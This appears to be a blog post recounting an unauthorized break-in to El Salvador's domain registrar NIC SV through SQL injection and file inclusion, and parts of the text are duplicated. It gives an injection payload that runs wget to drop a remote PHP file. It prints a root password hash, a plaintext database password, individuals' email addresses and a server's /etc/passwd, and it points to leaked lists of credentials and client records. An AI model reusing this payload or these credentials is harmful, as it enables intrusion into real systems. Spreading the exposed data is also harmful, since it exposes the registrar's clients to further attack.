Hacking a domain registrar
I was fucking bored one afternoon when a shitty fellow of mine contacted me and asked if I had ever tried to get into a domain registrar specifically the one from El Salvador NIC SV
He asked me this because he knows I've been to El Salvador and used to help the fellow Anons from SV. Thing is that I really never even thought about it but that got my attention and so I got my terminal on and started doing some poking around on the web portal. Since I had the need for a few beers and was feeling lazy, only scanned the web server.
Truth is that it didn't take much for me to find a SQLi vulnerability. And then another one and another one and so on. Found around 12 different SQLi vulnerabilities, 1 LFI vuln and a bunch of Blind SQLi vulns.
Since I had a bunch of options to use for exploitation I used the first one that came across with. The vulnerable parameter was/is (still) p_buscar.php
Only needed SQLmap with the following:
data="requireddominio=%3C%3Fphp+system%28%27wget+google.com%2Fx.txt+-O+remote.php%27%29%3B+%3F%3E&nivel=.com.sv&key=consult"
With this I was allowed to extract 11 databases:
available databases [11]:
[*] mysql
[*] SVNET
[*] SVNET2
[*] SVNET2011
[*] SVNET3
[*] SVNET4
[*] SVNET_DEV
[*] test
[*] wordpress
Found some candiez
User: root
Pass: *4C169475AC505CDF29B9D6FC069D8F405DEB1110
AND
Database: SVNET
Table: USUARIO
[7 entries]
+------------------+
| APE_USUARIO |
+------------------+
| Fernández |
| Gallegos mgallegos76@gmail.com |
| García Hernández |
| Ibarra ribarra@di.uca.edu.sv |
| Meléndez gerardomelendez@gmail.com |
| Peñate cpenate@buho.uca.edu.sv |
| Reyes Canizales helenecanizales@hotmail.com |
With this, I had the root username and the encrypted password (at least it was encrypted (lol))
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
This is more than enough to start bruteforcing the hash and login to the web portal as administrator or SSH their server but I'm not a defacer. More a pentester than anything so I just kept going and found some more candiez.
As mentioned above, I also found a LFI bug which can be confirmed by clicking here
As you know, a LFI vulnerability allows an attacker to see information written in /etc/passwd. With this vulnerability I can see information from the server as shown:
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:487:485:User for Avahi:/run/avahi-daemon:/bin/false
avahi-autoipd:x:488:486:User for Avahi IPv4LL:/var/lib/avahi-autoipd:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
dnsmasq:x:490:65534:dnsmasq:/var/lib/empty:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
kdm:x:486:484:KDM Display Manager daemon:/var:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:499:497:User for D-Bus:/run/dbus:/bin/false
mysql:x:60:489:MySQL database admin:/var/lib/mysql:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
nscd:x:498:495:User for nscd:/run/nscd:/sbin/nologin
ntp:x:74:496:NTP daemon:/var/lib/ntp:/bin/false
polkitd:x:497:494:User for polkitd:/var/lib/polkit:/sbin/nologin
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:493:491:PulseAudio daemon:/var/lib/pulseaudio:/sbin/nologin
root:x:0:0:root:/root:/bin/bash
rpc:x:494:65534:user for rpcbind:/var/lib/empty:/sbin/nologin
rtkit:x:495:492:RealtimeKit:/proc:/bin/false
scard:x:489:487:Smart Card Reader:/var/run/pcscd:/usr/sbin/nologin
sshd:x:496:493:SSH daemon:/var/lib/sshd:/bin/false
statd:x:492:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologin
tftp:x:491:488:TFTP account:/srv/tftpboot:/bin/false
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
operador:x:1000:100:operador:/home/operador:/bin/bash
webmstr:x:1001:100:webmstr:/srv/www:/bin/bash
In case they finally fix this you can still check it here
He asked me this because he knows I've been to El Salvador and used to help the fellow Anons from SV. Thing is that I really never even thought about it but that got my attention and so I got my terminal on and started doing some poking around on the web portal. Since I had the need for a few beers and was feeling lazy, only scanned the web server.
Truth is that it didn't take much for me to find a SQLi vulnerability. And then another one and another one and so on. Found around 12 different SQLi vulnerabilities, 1 LFI vuln and a bunch of Blind SQLi vulns.
Since I had a bunch of options to use for exploitation I used the first one that came across with. The vulnerable parameter was/is (still) p_buscar.php
Only needed SQLmap with the following:
data="requireddominio=%3C%3Fphp+system%28%27wget+google.com%2Fx.txt+-O+remote.php%27%29%3B+%3F%3E&nivel=.com.sv&key=consult"
With this I was allowed to extract 11 databases:
available databases [11]:
[*] mysql
[*] SVNET
[*] SVNET2
[*] SVNET2011
[*] SVNET3
[*] SVNET4
[*] SVNET_DEV
[*] test
[*] wordpress
Found some candiez
User: root
Pass: *4C169475AC505CDF29B9D6FC069D8F405DEB1110
AND
Database: SVNET
Table: USUARIO
[7 entries]
+------------------+
| APE_USUARIO |
+------------------+
| Fernández |
| Gallegos mgallegos76@gmail.com |
| García Hernández |
| Ibarra ribarra@di.uca.edu.sv |
| Meléndez gerardomelendez@gmail.com |
| Peñate cpenate@buho.uca.edu.sv |
| Reyes Canizales helenecanizales@hotmail.com |
With this, I had the root username and the encrypted password (at least it was encrypted (lol))
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
This is more than enough to start bruteforcing the hash and login to the web portal as administrator or SSH their server but I'm not a defacer. More a pentester than anything so I just kept going and found some more candiez.
As mentioned above, I also found a LFI bug which can be confirmed by clicking here
As you know, a LFI vulnerability allows an attacker to see information written in /etc/passwd. With this vulnerability I can see information from the server as shown:
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:487:485:User for Avahi:/run/avahi-daemon:/bin/false
avahi-autoipd:x:488:486:User for Avahi IPv4LL:/var/lib/avahi-autoipd:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
dnsmasq:x:490:65534:dnsmasq:/var/lib/empty:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
kdm:x:486:484:KDM Display Manager daemon:/var:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:499:497:User for D-Bus:/run/dbus:/bin/false
mysql:x:60:489:MySQL database admin:/var/lib/mysql:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
nscd:x:498:495:User for nscd:/run/nscd:/sbin/nologin
ntp:x:74:496:NTP daemon:/var/lib/ntp:/bin/false
polkitd:x:497:494:User for polkitd:/var/lib/polkit:/sbin/nologin
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:493:491:PulseAudio daemon:/var/lib/pulseaudio:/sbin/nologin
root:x:0:0:root:/root:/bin/bash
rpc:x:494:65534:user for rpcbind:/var/lib/empty:/sbin/nologin
rtkit:x:495:492:RealtimeKit:/proc:/bin/false
scard:x:489:487:Smart Card Reader:/var/run/pcscd:/usr/sbin/nologin
sshd:x:496:493:SSH daemon:/var/lib/sshd:/bin/false
statd:x:492:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologin
tftp:x:491:488:TFTP account:/srv/tftpboot:/bin/false
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
operador:x:1000:100:operador:/home/operador:/bin/bash
webmstr:x:1001:100:webmstr:/srv/www:/bin/bash
In case they finally fix this you can still check it here
Using all of this I was able to navigate among their .php scripts and even copied some sensitive data that should NOT be available to external users.
Here are some PHP scripts I got:
connections_conectar.php
# FileName="Connection_php_mysql.htm"
# Type="MYSQL"
# HTTP="true"
$hostname_conectar = "localhost";
$database_conectar = "SVNET2011";
$username_conectar = "root";
$password_conectar = "xkzygg";
$conectar = mysql_pconnect($hostname_conectar, $username_conectar, $password_conectar) or trigger_error(mysql_error());
?>
This is the script that connects the localhost to the database "SVNET2011" using the username "root" and the password "xkzygg"
Besides the mentioned script, I also found the following:
htdocs_ajax_proceso.php
pagos.php
registro_login.php
wp-config.php
Using the SQLi vulns I was able to extract loads of usernames, emails and registration passwords. You can find a short list of only 180 usernames, emails and passwords by clicking HERE this will take you to a pastebin.com site with the list.
Another juicy file I got is V_SUBDOMINIO_CLIENTE_ADM_INFO_NIC_SV
This file contains a list of client names and phone numbers registered at "NIC.SV"
I created a *.csv file which contains approximately 12k (12000) of entries. The file can be downloaded from Mega by clicking here
The worst of all of this is that I contacted the support staff of NIC.SV to let them know about the serious problems they have so they can fix them. Here I post some screenshots of the communication I had with them
After no more than 24 hours I got a reply from them stating that they were already working in order to correct the issues before exposed as shown
So, I waited for them to be fixed but even after several months they still not fixed. And I know they're not because I was able to dump everything again using the very same vulnerabilities found months ago which is lame and it terribly sucks for their clients since they and their information is not being protected because of lazy admins and that's the reason why I'm publishing this article today, maybe if they see this online and public would get to fix their shit.
Regards,
Iggy
Comments
Post a Comment